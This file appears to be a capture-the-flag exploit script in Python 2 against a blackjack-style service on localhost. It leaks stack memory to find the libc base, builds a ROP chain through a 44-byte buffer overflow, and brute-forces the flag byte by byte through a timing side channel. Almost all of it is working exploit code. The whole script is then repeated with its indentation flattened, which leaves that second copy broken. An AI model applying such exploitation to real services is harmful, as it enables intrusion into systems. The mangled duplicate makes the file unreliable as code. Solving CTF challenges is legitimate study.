otms61/jackshit.py

## jackshit.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
from time import sleep
import signal
import string


def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data


def p(a):
    return struct.pack("<I", a)


def u(a):
    return struct.unpack("<I", a)[0]


def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

libc_start_main_offset = 0x19990
libc_sleep_offset = 0xb5500
libc_jeax_offset = 0x0001a8f0
# 0x00094c23: add eax, edx ; ret
libc_add_eax_edx_offset = 0x00094c23
# 0x00001aa2: pop edx ; ret  ;  (15 found)
libc_pop_edx_offset = 0x0002e3cc
# 0x0002f06c: xor eax, eax ; ret  ;
libc_xor_eax_offset = 0x0002f06c


write_plt = 0x8048870
write_got = 0xb75ffc50
strcmp_plt = 0x80487b0
flag_bss = 0x0804B084

ret = 0x8048742
popret = 0x8048759
pop2ret = 0x8048ed7
pop3ret = 0x8048ed6
pop4ret = 0x8048ed5


s, f = sock('localhost', 1282)

s.send('2\n3\n')
s.send('1+1000\n')
read_until(f, 'got no game, dis all I got:\n')
stack_str = read_until(f, 'We\'ve')
ss = stack_str[:-5].replace('\n', ' ').split()
stack = [int(''.join(ss[i:i+4][::-1]), 0x10) for i in range(0, len(ss), 4)]
stack_addr = stack[10]
str_head = stack_addr - 277
libc_base = stack[71]-243-libc_start_main_offset
libc_sleep = libc_base + libc_sleep_offset
libc_jeax = libc_base + libc_jeax_offset
libc_add_eax_edx = libc_base + libc_add_eax_edx_offset
libc_pop_edx = libc_base + libc_pop_edx_offset
libc_xor_eax = libc_base + libc_xor_eax_offset

print '[*] stack addr: {}'.format(hex(stack_addr))
print '[*] str head addr: {}'.format(hex(str_head))
print '[*] libc base: {}'.format(hex(libc_base))
print '[*] sleep: {}'.format(hex(libc_sleep))
print '[*] pop edx: {}'.format(hex(libc_pop_edx))
del s, f

TIMEOUT = 1
class TimeoutError(Exception):
	pass

def alrarm_handler(signum, frame):
	raise TimeoutError()


def game(idx, flag):
	s, f = sock('localhost', 1282)
	def jack():
		n = 0
		while n <= 199:
			s.send('2\n3\n')
			read_until(f, 'You\'ve got $')
			read_until(f, 'You\'ve got $')
			money = read_until(f).strip()
			n = int(money)

	jack()

	s.send('4\n')

	payload = ''
	payload += 'a'*44
	payload += p(strcmp_plt)
	payload += p(pop2ret)
	payload += p(flag_bss+idx)
	payload += p(str_head + 44 + 4*8 - 3)
	payload += p(libc_pop_edx)
	payload += p(libc_jeax)
	payload += p(libc_add_eax_edx)
	payload += p(libc_jeax)
	payload += flag + '\x00'

	s.send(payload+'\n')

	signal.signal(signal.SIGALRM, alrarm_handler)
	signal.alarm(TIMEOUT)
	try:
		s.send('5\n')
		s.send('0\n')
		f.read()
	except TimeoutError:
		return True
	except socket.error:
		signal.alarm(0)
		return False


flag = ''
for idx in range(50, -1, -1):
	for c in '\x00\n' + string.printable:
		print c
		if game(idx, c+flag):
			flag = c + flag
			print 'idx: {}, flag: {} '.format(c, flag)
			break
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket
	import struct
	import telnetlib
	from time import sleep
	import signal
	import string


	def sock(remoteip, remoteport):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((remoteip, remoteport))
	f = s.makefile('rw', bufsize=0)
	return s, f


	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data


	def p(a):
	return struct.pack("<I", a)


	def u(a):
	return struct.unpack("<I", a)[0]


	def shell(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	libc_start_main_offset = 0x19990
	libc_sleep_offset = 0xb5500
	libc_jeax_offset = 0x0001a8f0
	# 0x00094c23: add eax, edx ; ret
	libc_add_eax_edx_offset = 0x00094c23
	# 0x00001aa2: pop edx ; ret ; (15 found)
	libc_pop_edx_offset = 0x0002e3cc
	# 0x0002f06c: xor eax, eax ; ret ;
	libc_xor_eax_offset = 0x0002f06c


	write_plt = 0x8048870
	write_got = 0xb75ffc50
	strcmp_plt = 0x80487b0
	flag_bss = 0x0804B084

	ret = 0x8048742
	popret = 0x8048759
	pop2ret = 0x8048ed7
	pop3ret = 0x8048ed6
	pop4ret = 0x8048ed5


	s, f = sock('localhost', 1282)

	s.send('2\n3\n')
	s.send('1+1000\n')
	read_until(f, 'got no game, dis all I got:\n')
	stack_str = read_until(f, 'We\'ve')
	ss = stack_str[:-5].replace('\n', ' ').split()
	stack = [int(''.join(ss[i:i+4][::-1]), 0x10) for i in range(0, len(ss), 4)]
	stack_addr = stack[10]
	str_head = stack_addr - 277
	libc_base = stack[71]-243-libc_start_main_offset
	libc_sleep = libc_base + libc_sleep_offset
	libc_jeax = libc_base + libc_jeax_offset
	libc_add_eax_edx = libc_base + libc_add_eax_edx_offset
	libc_pop_edx = libc_base + libc_pop_edx_offset
	libc_xor_eax = libc_base + libc_xor_eax_offset

	print '[*] stack addr: {}'.format(hex(stack_addr))
	print '[*] str head addr: {}'.format(hex(str_head))
	print '[*] libc base: {}'.format(hex(libc_base))
	print '[*] sleep: {}'.format(hex(libc_sleep))
	print '[*] pop edx: {}'.format(hex(libc_pop_edx))
	del s, f

	TIMEOUT = 1
	class TimeoutError(Exception):
	pass

	def alrarm_handler(signum, frame):
	raise TimeoutError()


	def game(idx, flag):
	s, f = sock('localhost', 1282)
	def jack():
	n = 0
	while n <= 199:
	s.send('2\n3\n')
	read_until(f, 'You\'ve got $')
	read_until(f, 'You\'ve got $')
	money = read_until(f).strip()
	n = int(money)

	jack()

	s.send('4\n')

	payload = ''
	payload += 'a'*44
	payload += p(strcmp_plt)
	payload += p(pop2ret)
	payload += p(flag_bss+idx)
	payload += p(str_head + 44 + 4*8 - 3)
	payload += p(libc_pop_edx)
	payload += p(libc_jeax)
	payload += p(libc_add_eax_edx)
	payload += p(libc_jeax)
	payload += flag + '\x00'

	s.send(payload+'\n')

	signal.signal(signal.SIGALRM, alrarm_handler)
	signal.alarm(TIMEOUT)
	try:
	s.send('5\n')
	s.send('0\n')
	f.read()
	except TimeoutError:
	return True
	except socket.error:
	signal.alarm(0)
	return False


	flag = ''
	for idx in range(50, -1, -1):
	for c in '\x00\n' + string.printable:
	print c
	if game(idx, c+flag):
	flag = c + flag
	print 'idx: {}, flag: {} '.format(c, flag)
	break